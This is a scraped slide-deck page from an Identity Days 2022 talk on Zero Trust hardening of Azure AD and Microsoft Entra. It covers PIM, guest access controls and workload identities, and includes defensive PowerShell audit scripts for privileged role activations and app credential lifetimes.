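    [pscustomobject]@{ principalId = 'aaaaaaaa-0000-0000-0000-000000000004'; assignmentType = 'Activated'; memberType = 'Group';  startDateTime = '2022-10-27T08:00:00Z'; endDateTime = '2022-10-27T16:00:00Z' }
)
Test-PrivilegedAssignments -Instances $sample -BreakGlassIds $bg | Format-Table   # two findings
# Live: Test-PrivilegedAssignments -Instances (Get-RoleAssignmentInstances -AccessToken $token) -BreakGlassIds $BreakGlassIds
```

The activation ceiling itself is set in the PIM role settings ("Activation maximum duration"); this audit catches the roles where that setting was never lowered, and the memberType column shows assignments inherited through groups, which are easy to miss in the portal.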
Part 4: Use Microsoft Defender for Identity
Why use Microsoft Defender for Identity?
• Hyperscale SaaS protection in Azure
• Defender for Cloud Apps integration
• Multi-forest support
• Detection of DCShadow (and of the DCSync replication seen in the kill chain above)
• Continuous updates in SaaS mode
• Sensor and standalone sensor (inherited from ATA)
• Included with EMS E5, M365 E5 and M365 E5 Security
Part 5: Identity Governance – use the new lifecycle workflows (Microsoft Entra Identity Governance)
Onboarding workflow for a new hire (what a lifecycle workflow automates):
1. Create the user account (status: disabled)
2. Generate a Temporary Access Pass (TAP)
3. Send an e-mail with the TAP to the hiring manager
4. Group assignments
5. Send an e-mail to the onboarding distribution list
6. On the start date: enable the user account
7. Send a welcome e-mail to the new hire
8. Add the user to the "New Hires" Teams channel
9. Launch a custom Logic Apps workflow for anything else
Part 6: Management of external identities and collaboration
Part 6 (continued): External identities and the new cross-tenant access settings
Cross-tenant access best practices
• Use case 1: configure B2B collaboration
• Use case 2: configure B2B direct connect
• Configure inbound settings granularly, trusting MFA and compliant-device claims from the partner tenant
• Configure outbound settings granularly and scope them to your groups
• Block all outbound B2B collaboration by default
• Use Teams shared channels
Part 7: Protect yourself against guest and external users with 9 control points
01. Dedicated Conditional Access policy for MFA (impact: Medium)
02. Dynamic group including all external / guest users (impact: Low)
03. CA hardening: block all cloud apps except Teams / SPO (impact: High)
04. CA terms of use (impact: Medium)
05. Restriction: prevent download, web-only access for sensitive Teams / SharePoint sites (impact: High)
06. Session timeout (daily MFA / authentication) (impact: High)
07. Access reviews for guest accounts (impact: Medium)
08. Sensitivity labels for M365 groups (Teams and SharePoint Online) (impact: High)
09. Dedicated audit log for guest / external user access (impact: High)
Part 8: Protect your workload identities
68% of workloads can access sensitive data and assets (source: SCIM Quarterly Analysis, July 7th, 2022)
Human identities vs. machine identities: about 5 machine IDs for every human ID (source: Microsoft Security internal research, 2021)
Part 8 (continued): Protect your workload identities
Human identities vs. machine identities, tomorrow: about 20 machine IDs for every human ID
1. Deploy access reviews for service principals
2. Configure Conditional Access for workload identities
3. Deploy Azure AD Identity Protection for workload identities
4. Set up the admin consent workflow (users request, admins approve)
5. Audit and log with Defender for Cloud Apps / Microsoft Sentinel
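Before access reviews and Conditional Access can help, the credentials of those machine identities need to be in order. The following is an added example, not from the slides: it flags app registrations whose secrets or certificates are expired but still attached, or valid for longer than a policy allows (long-lived secrets are the ones that end up in repositories and tickets). The record shape follows the Graph v1.0 /applications resource with $select=id,displayName,passwordCredentials,keyCredentials; the records here are constructed.

```powershell
# Added example (not from the slides): credential hygiene for workload identities.

function Test-WorkloadCredentials {
    param(
        [Parameter(Mandatory)][object[]]$Applications,   # displayName, passwordCredentials, keyCredentials
        [int]$MaxLifetimeDays = 180,
        [datetime]$Now = (Get-Date)
    )
    foreach ($app in $Applications) {
        $sets = @{ Secret = $app.passwordCredentials; Certificate = $app.keyCredentials }
        foreach ($kind in $sets.Keys) {
            foreach ($c in @($sets[$kind])) {
                if ($null -eq $c) { continue }
                $start    = [datetime]$c.startDateTime
                $end      = [datetime]$c.endDateTime
                $lifetime = ($end - $start).TotalDays
                $finding  = if ($end -lt $Now) { 'Expired credential still attached: remove it' }
                            elseif ($lifetime -gt $MaxLifetimeDays) { "Lifetime of $([int]$lifetime) days exceeds $MaxLifetimeDays: rotate, prefer certificates or federated credentials" }
                if ($finding) {
                    [pscustomobject]@{ App = $app.displayName; Kind = $kind; KeyId = $c.keyId; Expires = $end; Finding = $finding }
                }
            }
        }
    }
}

# Constructed app registrations: one with an expired secret and a two-year secret,
# one with a certificate inside the 180-day policy.
$now    = [datetime]'2022-10-27T12:00:00'
$sample = @(
    [pscustomobject]@{ displayName = 'hr-sync-job'; keyCredentials = @(); passwordCredentials = @(
        [pscustomobject]@{ keyId = 'k1'; startDateTime = '2021-01-01T00:00:00Z'; endDateTime = '2022-01-01T00:00:00Z' },   # expired
        [pscustomobject]@{ keyId = 'k2'; startDateTime = '2022-09-01T00:00:00Z'; endDateTime = '2024-09-01T00:00:00Z' }    # two-year secret
    ) },
    [pscustomobject]@{ displayName = 'api-gateway'; passwordCredentials = @(); keyCredentials = @(
        [pscustomobject]@{ keyId = 'c1'; startDateTime = '2022-07-01T00:00:00Z'; endDateTime = '2022-12-28T00:00:00Z' }    # 180 days: compliant
    ) }
)
Test-WorkloadCredentials -Applications $sample -Now $now | Format-Table   # two findings, both on hr-sync-job
# Live: Invoke-RestMethod -Uri 'https://graph.microsoft.com/v1.0/applications?$select=id,displayName,passwordCredentials,keyCredentials' `
#         -Headers @{ Authorization = "Bearer $token" } | ForEach-Object { Test-WorkloadCredentials -Applications $_.value }
```

The live query is paged like every Graph collection; follow @odata.nextLink as in the PIM example above. An application with no credentials at all and no recent sign-in is a candidate for the access review in item 1, not for this check.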
Part 9: Management of external identities and collaboration
Part 10: To go beyond…
User access strategy
• Admin users: cloud-only
• PIM with only the required rights:
  - Global Administrator: 2 h
  - Other roles: 4 h
• MFA / passwordless FIDO2
• Conditional Access:
  - Scope: admin users
  - Exclude: break-glass accounts
  - Device: Windows
  - Location: trusted locations
  - Grant: require the device to be marked as compliant
• Identity Protection:
  - Sign-in risk
  - User risk
• Password Protection
Privileged Access Workstation
• Azure AD Autopilot profile
• Compliance with Endpoint Manager
• Security & hardening device profile
• Security baseline
• Deny BYOD
• Windows Update configuration
• Defender for Endpoint integrated with Endpoint Manager
Part 11: The tomorrow model…
Enterprise access model
• Tier 0: control plane (identity systems and their management)
• Tier 1: management plane, data/workload plane, applications
• Tier 2: user access, application access (APIs, …)
Part 12: SecOps
A SecOps implementation is essential
• Unified alert management
• Unified incident management
• Log management / forwarding
• Proactivity
• Automatic playbook triggers via Microsoft Sentinel (remember to add the Azure AD data connectors)
• Have a real detection / hunting / response strategy
• Don't forget hunting with KQL
• Use the Microsoft 365 Defender portal
Conclusion
Zero Trust smooth deployment in 12 steps
Think hybrid and protect your on-premises Active Directory environment!
1. Use Azure AD as your IAM
2. Manage identity and access
3. Provision users
4. Control all authentications
5. Implement strong and secure authentication
6. Evaluate authentications and credentials
7. Determine trusted zones
8. Determine resource access
9. Apply least privilege
10. Secure administrative rights
11. Take advantage of Conditional Access
12. Train continuously!
The six themes of the deployment (diagram):
• Modernize identity and device management
• Consolidation, then legacy infrastructure cleanup
• Configure secure access for all types of users
• Secure your hybrid environment
• Strong authentication, Conditional Access and intelligent strategies
• Secure experience for all users
Finally, our Zero Trust "to-do list"
Microsoft documentation!
• Zero Trust Document Center: https://docs.microsoft.com/en-us/security/zero-trust/
• Monitor your Azure AD Secure Score: https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity-secure-score
• Integrate your apps into Azure AD: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an-application-integration
• Enable PHS; do not use PTA or ADFS federation
• Enable Seamless SSO and minimize the use of on-premises ADFS
• Azure MFA + passwordless with FIDO2 (Yubico, …)
• Use PIM for IT teams
• Use Azure AD Identity Protection for everyone
• Privileged accounts | backup accounts | MFA | passwordless
• Security Update Guide: patch and patch again! https://msrc.microsoft.com/update-guide/
Conditional Access
• MFA for guests
• MFA for everyone
• Access policies and trusted locations
• Test | What If?
Reports - SecOps
• Devices
• Azure AD logs (sign-ins and applications)
• Users at risk: logins, locations, IP, GPS, Cloud App Security
• Azure Sentinel
Passwords
• SSPR
• Smart Lockout Azure AD / Active Directory
• Password Protection
Education & communication with users
• Internal training / cyber best practices
Thanks to all our partners!
@IdentityDays #identitydays2022 Thank you all ✨👍

Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
 
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ..."Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
"Secure Mobile Apps with the Microsoft Identity Platform", Christos Matskas, ...
 
Information Barriers in MS Teams
Information Barriers in MS TeamsInformation Barriers in MS Teams
Information Barriers in MS Teams
 
Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022Microsoft Azure News - Dec 2022
Microsoft Azure News - Dec 2022
 
Azure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish KalamatiAzure from scratch part 2 By Girish Kalamati
Azure from scratch part 2 By Girish Kalamati
 
Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022Microsoft Azure News - Nov 2022
Microsoft Azure News - Nov 2022
 
Introduction to basic governance in Azure - #GABDK
Introduction to basic governance in Azure - #GABDKIntroduction to basic governance in Azure - #GABDK
Introduction to basic governance in Azure - #GABDK
 

More from Identity Days

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromis
Identity Days
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Identity Days
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Identity Days
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratique
Identity Days
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
Identity Days
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Identity Days
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
Identity Days
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant Intune
Identity Days
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Identity Days
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...
Identity Days
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Identity Days
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Identity Days
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Identity Days
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
Identity Days
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptx
Identity Days
 
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
Identity Days
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...
Identity Days
 
Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?
Identity Days
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active Directory
Identity Days
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger !
Identity Days
 

More from Identity Days (20)

Live Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromisLive Action : assistez à la récupération d’un AD compromis
Live Action : assistez à la récupération d’un AD compromis
 
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
Directive européenne NIS2 : Etes-vous concerné ? Comment s’y préparer ?
 
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
Quelle approche préventive adopter pour empêcher les mouvements latéraux au s...
 
Passwordless – de la théorie à la pratique
Passwordless – de la théorie à la pratiquePasswordless – de la théorie à la pratique
Passwordless – de la théorie à la pratique
 
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
L’authentification à l’Ère des grandes ruptures technologiques, un Virage à p...
 
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
Est-il possible de combiner sécurité physique, cybersécurité et biométrie déc...
 
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
SSO as a Service ou comment mettre en oeuvre une architecture SSO DevOps avec...
 
Gérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant IntuneGérer les privilèges locaux en utilisant Intune
Gérer les privilèges locaux en utilisant Intune
 
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
Comment et pourquoi maîtriser les privilèges d’administrateur local sur Windo...
 
Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...Les angles morts de la protection des identités : Les comptes de services et ...
Les angles morts de la protection des identités : Les comptes de services et ...
 
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...Construire un moteur de workflow modulaire et convivial dans une gestion des ...
Construire un moteur de workflow modulaire et convivial dans une gestion des ...
 
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure ADDémos d’attaques par rebond en environnement hybride Active Directory-Azure AD
Démos d’attaques par rebond en environnement hybride Active Directory-Azure AD
 
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
Des outils 100% Open Source pour gérer votre annuaire LDAP et votre Active Di...
 
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NGSSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
SSO et fédération d’identités avec le logiciel libre LemonLDAP::NG
 
Gestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptxGestion de la dette technique – Le tier legacy-2023.pptx
Gestion de la dette technique – Le tier legacy-2023.pptx
 
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
L’iam : au-delà des idées reçues, les clés de la gestion des identités et des...
 
Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...Récupération d’un Active Directory: comment repartir en confiance après une c...
Récupération d’un Active Directory: comment repartir en confiance après une c...
 
Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?Provisionnement et gestion d’identité : Où en est-on ?
Provisionnement et gestion d’identité : Où en est-on ?
 
Nouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active DirectoryNouvelle approche pour étendre le zéro trust à Active Directory
Nouvelle approche pour étendre le zéro trust à Active Directory
 
L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger ! L’authentification sans mot de passe, la meilleure façon de se protéger !
L’authentification sans mot de passe, la meilleure façon de se protéger !
 

Recently uploaded

HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
Claudio Di Ciccio
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
Zilliz
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Malak Abu Hammad
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
ssuserfac0301
 
CAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on BlockchainCAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on Blockchain
Claudio Di Ciccio
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
Techgropse Pvt.Ltd.
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
kumardaparthi1024
 

Recently uploaded (20)

HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdfUnlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
CAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on BlockchainCAKE: Sharing Slices of Confidential Data on Blockchain
CAKE: Sharing Slices of Confidential Data on Blockchain
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 

Apply the Zero Trust model for hardening your Azure AD!

  • 1. Thanks to all our partners! 27 October 2022 - PARIS @IdentityDays #identitydays2022
  • 2. Jean-François Apréa: CEO and Founder AZ IT Consulting | IT & Cloud Architect | Microsoft Azure Specialist | MVP Security | MVP Cloud and Datacenter Management (16) | Author | Speaker | Trainer (MCT Alumni)
       Seyfallah Tagrerout: CEO and Founder STC Consulting | Cloud and Security Architect | Microsoft Azure Specialist | Microsoft Zero Trust Specialist | MVP Azure and Enterprise Mobility (8) | Author | Speaker | Trainer
       Apply the Zero Trust model for Hardening your Azure AD
  • 3. Identity Days 2022, 27 October 2022 - PARIS. Agenda: Zero Trust? It’s urgent to go, because it’s urgent to be really protected!
       - Azure AD & Microsoft Entra
       - Zero Trust and Microsoft vision
       - Azure AD is Identity and Access Control centric
       - Azure AD Kill Chain
       - Azure AD Hardening with Zero Trust in mind 😊
       - Good practices and 12-step action plan
  • 4. It becomes difficult to be up-to-date… Hackers don’t give a shit! (Source: Jean-Charles Duret-Ferrari)
       - About your project’s scope…
       - It’s managed by a third party…
       - It’s a legacy system…
       - It’s too critical to patch…
       - You’ve always done it that way…
       - About your Go-Live date…
       - It’s only a Pilot/POC, not production…
       - About NDA…
       - It was not a mandatory requirement…
       - It is a non-exposed internal system…
       - It is hard to change…
       - It is handled in the Cloud…
       - The vendor does not support this…
       - It is an interim solution…
       - It is encrypted on disk…
       - You cannot explain the Risk to the Business…
       - You have other priorities…
       - You don’t have a Business justification…
       - You cannot have ROI…
       - You contracted out that risk…
       Really, too many bad reasons!
  • 5. Azure AD & Microsoft Entra
  • 6. Azure Active Directory & Microsoft Entra
       Azure Active Directory: Identity & Access Management; inter-connected ecosystem; Security; Hybrid Cloud; several types of identities
       Microsoft Entra: Azure Active Directory; Microsoft Entra Permissions Management; Microsoft Entra Verified ID; Microsoft Entra Workload Identities; Microsoft Entra Identity Governance
  • 8. About Zero Trust and Microsoft vision
  • 9. Microsoft Zero Trust vision: Verify explicitly; Use least privileged access; Assume breach
  • 10. Microsoft Zero Trust vision
       Assume breach: assume attackers can and will successfully attack anything (identity, network, device, app, infrastructure, etc.) and plan accordingly. This transforms overall thinking, strategy and architectures from “safe network” to “open network”. Asset/Node = user, app, device, data, API, etc.
       Verify explicitly: protect assets against attacker control by explicitly validating that all trust and security decisions use all relevant available information and telemetry. This reduces the “attack surface” of each asset.
       Use least privilege access: limit the access of a potentially compromised asset, typically with just-in-time and just-enough-access (JIT/JEA) and risk-based policies like adaptive access control. This reduces the blast radius of compromises.
  • 11. Azure AD is Identity and Access Control centric
  • 12. Azure AD Access Control plane: verification of each access attempt; access control to Apps and Data; Azure AD signals. Never trust, always verify…
  • 13. Azure AD Access Control
